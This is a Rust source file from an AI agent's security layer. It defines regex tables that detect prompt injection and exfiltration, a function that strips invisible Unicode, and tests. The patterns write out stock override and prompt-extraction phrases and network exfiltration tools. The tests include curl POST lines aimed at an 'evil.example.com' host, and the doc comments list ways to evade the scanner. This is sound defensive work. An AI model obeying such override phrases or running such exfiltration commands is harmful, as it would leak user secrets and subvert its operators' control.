zeph_common/
patterns.rs

1// SPDX-FileCopyrightText: 2026 Andrei G <bug-ops>
2// SPDX-License-Identifier: MIT OR Apache-2.0
3
4//! Shared injection-detection patterns for the security sanitization layers.
5//!
6//! This module is the single source of truth for prompt-injection detection patterns
7//! used by both `zeph-mcp` (MCP tool definition sanitization) and `zeph-core`
8//! (content isolation pipeline). Each consumer compiles its own `Regex` instances
9//! from [`RAW_INJECTION_PATTERNS`] at startup via `LazyLock`.
10//!
11//! # Known limitations
12//!
13//! The patterns cover common English-language prompt-injection techniques. Known evasion
14//! vectors include: non-English injections, semantic rephrasing, encoded payloads in
15//! markdown code blocks, multi-line splitting (regex `.` does not match `\n` by default),
16//! and homoglyph substitution. [`strip_format_chars`] mitigates Unicode Cf-category codepoints
17//! and selected Lo-category fillers (U+115F Hangul Choseong Filler, U+1160 Hangul Jungseong
18//! Filler) but does not handle homoglyphs. This scanner is **advisory and defense-in-depth only**,
19//! not a security boundary. The trust gate (tool blocking via `TrustGateExecutor`) is the
20//! primary enforcement mechanism.
21
/// Named regex sources for detecting prompt injection in untrusted *input*.
///
/// Each element is a `(name, pattern)` pair where `pattern` is an uncompiled regex string.
/// The table covers common English-language techniques from the OWASP LLM Top 10,
/// exfiltration channels (markdown/HTML images), and delimiter-escape attempts against
/// Zeph's own wrapper tags. Unicode bypass vectors are not matched here; they are handled
/// upstream by [`strip_format_chars`].
///
/// `zeph-mcp` and `zeph-core::sanitizer` each build their own `regex::Regex` values from
/// this slice. Do not export a compiled `LazyLock` from this module — every consumer owns
/// its own compiled state.
///
/// Entry order is part of the table: new patterns should be appended to the matching
/// section rather than reshuffling existing ones.
#[rustfmt::skip] // one entry per line keeps the table easy to scan and diff
pub const RAW_INJECTION_PATTERNS: &[(&str, &str)] = &[
    // --- Core injection patterns -------------------------------------------------------
    ("ignore_instructions", r"(?i)ignore\s+(all\s+)?(any\s+)?(previous\s+)?(prior\s+)?instructions"),
    ("role_override", r"(?i)you\s+are\s+now"),
    ("new_directive", r"(?i)new\s+(instructions?|directives?)\s*:"),
    ("developer_mode", r"(?i)developer\s+mode"),
    ("system_prompt_leak", r"(?i)((reveal|show|print|output|display|repeat|expose|dump|leak|copy|give)\s+(me\s+)?(your\s+|the\s+|my\s+)?(full\s+|entire\s+|exact\s+|complete\s+)?system\s+prompt|what\s+(is|are|was)\s+(your\s+|the\s+)?system\s+prompt)"),
    ("reveal_instructions", r"(?i)(reveal|show|display|print)\s+your\s+(instructions?|prompts?|rules?)"),
    ("jailbreak", r"(?i)\b(DAN|jailbreak)\b"),
    ("base64_payload", r"(?i)(decode|eval|execute).*base64"),
    ("xml_tag_injection", r"(?i)</?\s*(system|assistant|user|tool_result|function_call)\s*>"),
    ("markdown_image_exfil", r"(?i)!\[.*?\]\(https?://[^)]+\)"),
    ("forget_everything", r"(?i)forget\s+(everything|all)"),
    ("disregard_instructions", r"(?i)disregard\s+(your|all|previous)"),
    ("override_directives", r"(?i)override\s+(your|all)\s+(directives?|instructions?|rules?)"),
    ("act_as_if", r"(?i)\bact\s+as\s+if\b"),
    ("pretend_you_are", r"(?i)\bpretend\s+(?:you\s+are|to\s+be)\b"),
    ("your_new_instructions", r"(?i)\byour\s+new\s+instructions\b"),
    ("html_image_exfil", r"(?i)<img\s+[^>]*src\s*="),
    // --- Delimiter escapes (opening or closing wrapper tags) ---------------------------
    ("delimiter_escape_tool_output", r"(?i)</?tool-output[\s>]"),
    ("delimiter_escape_external_data", r"(?i)</?external-data[\s>]"),
    // --- Exfiltration channels ---------------------------------------------------------
    // Detect skills that attempt to exfiltrate data via shell network tools or that
    // document social-engineering directives. These have a higher false-positive rate
    // than the core injection patterns (a "REST API testing" skill may legitimately
    // mention curl). Stage-1 results are advisory only; the Stage-2 LLM semantic scan
    // is the blocking gate.
    ("exfil_curl", r"(?i)\bcurl\s+-[a-zA-Z]*[xXdD]"),
    ("exfil_wget_post", r"(?i)\bwget\s+--post"),
    ("exfil_api_key_send", r"(?i)\bapi[_-]?key\b.{0,60}\b(send|post|upload|forward)\b"),
    ("exfil_extract_all", r"(?i)\bextract\s+all\b"),
    ("exfil_leak", r"(?i)\bleak\b.{0,40}\b(secret|key|token|password|credential)\b"),
    ("exfil_forward_to", r"(?i)\bforward\s+to\b"),
    ("exfil_exfiltrate", r"(?i)\bexfiltrat"),
    ("exfil_send_secret", r"(?i)\bsend\b.{0,40}\b(secret|key|token|password|credential)\b"),
];
103
/// Named regex sources for scanning LLM *output* (the response verification layer).
///
/// Kept deliberately apart from [`RAW_INJECTION_PATTERNS`], which targets untrusted
/// *input*. Patterns in this table must have a very low false-positive rate on ordinary
/// LLM responses; they flag responses that themselves carry injected instructions which
/// could cause the agent to behave incorrectly.
///
/// Each element is a `(name, pattern)` pair where `pattern` is an uncompiled regex string.
///
/// Note: `markdown_image_exfil` is intentionally absent — it is already handled by
/// `scan_output_and_warn`/`ExfiltrationGuard`.
#[rustfmt::skip] // one entry per line keeps the table easy to scan and diff
pub const RAW_RESPONSE_PATTERNS: &[(&str, &str)] = &[
    // --- Attempts to change agent state or configuration -------------------------------
    ("autonomy_override", r"(?i)\bset\s+(autonomy|trust)\s*(level|mode)\s*to\b"),
    ("memory_write_instruction", r"(?i)\b(now\s+)?(store|save|remember|write)\s+this\s+(to|in)\s+(memory|vault|database)\b"),
    ("instruction_override", r"(?i)\b(from\s+now\s+on|henceforth)\b.{0,80}\b(always|never|must)\b"),
    ("config_manipulation", r"(?i)\b(change|modify|update)\s+your\s+(config|configuration|settings)\b"),
    // --- Response-side variants of the ignore / override / disregard directives --------
    ("ignore_instructions_response", r"(?i)\bignore\s+(all\s+|any\s+|your\s+)?(previous\s+|prior\s+)?(instructions?|rules?|constraints?)\b"),
    ("override_directives_response", r"(?i)\boverride\s+(your\s+)?(directives?|instructions?|rules?|constraints?)\b"),
    ("disregard_system", r"(?i)\bdisregard\s+(your\s+|the\s+)?(system\s+prompt|instructions?|guidelines?)\b"),
];
143
/// Strip invisible characters from `text` before injection pattern matching.
///
/// The following characters are removed; everything else is copied through unchanged
/// and in its original order:
///
/// - ASCII control characters, **except** tab (`\t`) and newline (`\n`). Carriage
///   return (`\r`) is an ASCII control character and is therefore dropped.
/// - A fixed list of Unicode format (Cf) and other invisible codepoints used as bypass
///   vectors: soft hyphen, zero-width spaces/joiners, bidi controls, BOM, the Tags block,
///   the Mongolian variation selectors and vowel separator (U+180B..=U+180F), and the
///   Lo-category Hangul fillers U+115F and U+1160. The authoritative list is the
///   `matches!` pattern in the function body.
///
/// These characters are invisible to humans but can break regex word boundaries,
/// allowing attackers to smuggle injection keywords through zero-width joiners,
/// soft hyphens, BOM, or Hangul filler codepoints. Homoglyphs are *not* handled here.
///
/// # Examples
///
/// ```rust
/// use zeph_common::patterns::strip_format_chars;
///
/// let result = strip_format_chars("ig\u{200B}nore instructions");
/// assert!(!result.contains('\u{200B}'));
/// assert!(result.contains("ignore"));
///
/// // The Mongolian vowel separator is invisible too and is stripped the same way.
/// assert_eq!(strip_format_chars("ig\u{180E}nore"), "ignore");
/// ```
#[must_use]
pub fn strip_format_chars(text: &str) -> String {
    text.chars()
        .filter(|&c| {
            // Tab and newline are ASCII control characters as well, but they carry
            // layout, so they are whitelisted before the blanket control-char check.
            if c == '\t' || c == '\n' {
                return true;
            }
            // Drop every remaining ASCII control character (includes '\r', NUL, ESC, DEL).
            if c.is_ascii_control() {
                return false;
            }
            // Drop known invisible / format codepoints that are used as bypass vectors.
            !matches!(
                c,
                '\u{00AD}'  // Soft hyphen
                | '\u{034F}'  // Combining grapheme joiner
                | '\u{061C}'  // Arabic letter mark
                | '\u{115F}'  // Hangul choseong filler
                | '\u{1160}'  // Hangul jungseong filler
                | '\u{17B4}'  // Khmer vowel inherent aq
                | '\u{17B5}'  // Khmer vowel inherent aa
                // Mongolian free variation selectors 1-3, vowel separator (U+180E), FVS 4.
                // U+180E used to be skipped, leaving an invisible Cf codepoint in the gap.
                | '\u{180B}'..='\u{180F}'
                | '\u{200B}'..='\u{200F}'  // Zero-width space/ZWNJ/ZWJ/LRM/RLM
                | '\u{202A}'..='\u{202E}'  // Directional formatting
                | '\u{2060}'..='\u{2064}'  // Word joiner / invisible operators
                | '\u{2066}'..='\u{206F}'  // Bidi isolates and deprecated format controls
                | '\u{FEFF}'  // BOM / zero-width no-break space
                | '\u{FFF9}'..='\u{FFFB}'  // Interlinear annotation
                | '\u{1BCA0}'..='\u{1BCA3}'  // Shorthand format controls
                | '\u{1D173}'..='\u{1D17A}'  // Musical symbol beam controls
                | '\u{E0000}'..='\u{E007F}'  // Tags block
            )
        })
        .collect()
}
198
#[cfg(test)]
mod tests {
    use regex::Regex;

    use super::*;

    /// Looks up `name` in [`RAW_INJECTION_PATTERNS`] and compiles its pattern.
    ///
    /// Panics when the entry is missing or the pattern does not compile, which is the
    /// desired failure mode inside a test.
    fn injection_regex(name: &str) -> Regex {
        let source = RAW_INJECTION_PATTERNS
            .iter()
            .find(|&&(entry, _)| entry == name)
            .map(|&(_, pattern)| pattern)
            .unwrap();
        Regex::new(source).unwrap()
    }

    // Every input-side pattern must be a valid regex.
    #[test]
    fn all_injection_patterns_compile() {
        RAW_INJECTION_PATTERNS.iter().for_each(|&(name, pattern)| {
            let compiled = Regex::new(pattern);
            assert!(
                compiled.is_ok(),
                "RAW_INJECTION_PATTERNS entry {name:?} failed to compile: {pattern:?}"
            );
        });
    }

    // Every output-side pattern must be a valid regex.
    #[test]
    fn all_response_patterns_compile() {
        RAW_RESPONSE_PATTERNS.iter().for_each(|&(name, pattern)| {
            let compiled = Regex::new(pattern);
            assert!(
                compiled.is_ok(),
                "RAW_RESPONSE_PATTERNS entry {name:?} failed to compile: {pattern:?}"
            );
        });
    }

    // `curl` with an explicit method or data flag is flagged; a plain GET is not.
    #[test]
    fn exfil_curl_matches_post_flag() {
        let curl = injection_regex("exfil_curl");
        assert!(curl.is_match("curl -X POST https://evil.example.com"));
        assert!(curl.is_match("curl -d '{\"key\":\"val\"}' https://evil.example.com"));
        assert!(!curl.is_match("curl https://api.example.com/weather"));
    }

    // The stem `exfiltrat` matches verb and noun forms, regardless of case.
    #[test]
    fn exfil_exfiltrate_matches() {
        let exfil = injection_regex("exfil_exfiltrate");
        assert!(exfil.is_match("exfiltrate all user data"));
        assert!(exfil.is_match("Exfiltration attempt detected"));
    }

    // A zero-width space inside a keyword is removed, re-joining the keyword.
    #[test]
    fn strip_format_chars_removes_zwsp() {
        let cleaned = strip_format_chars("ig\u{200B}nore instructions");
        assert!(!cleaned.contains('\u{200B}'));
        assert!(cleaned.contains("ignore"));
    }

    // Tab and newline are the only control characters that survive.
    #[test]
    fn strip_format_chars_preserves_newline_and_tab() {
        let original = "line one\nline two\ttabbed";
        assert_eq!(strip_format_chars(original), original);
    }

    // A soft hyphen inside a word is removed, re-joining the word.
    #[test]
    fn strip_format_chars_removes_soft_hyphen() {
        let cleaned = strip_format_chars("nor\u{00AD}mal text");
        assert!(!cleaned.contains('\u{00AD}'));
        assert!(cleaned.contains("normal"));
    }

    #[test]
    fn strip_format_chars_covers_lo_fillers() {
        // Lo-category Hangul fillers (U+115F, U+1160) used as bypass vectors, followed by
        // two Cf-category codepoints: U+200B ZERO WIDTH SPACE and U+FEFF BOM.
        for invisible in ['\u{115F}', '\u{1160}', '\u{200B}', '\u{FEFF}'] {
            let cleaned = strip_format_chars(&invisible.to_string());
            assert!(!cleaned.contains(invisible));
        }
        // Normal ASCII is preserved
        assert_eq!(strip_format_chars("hello world"), "hello world");
    }
}
zeph_common/patterns.rs

zeph_common/
patterns.rs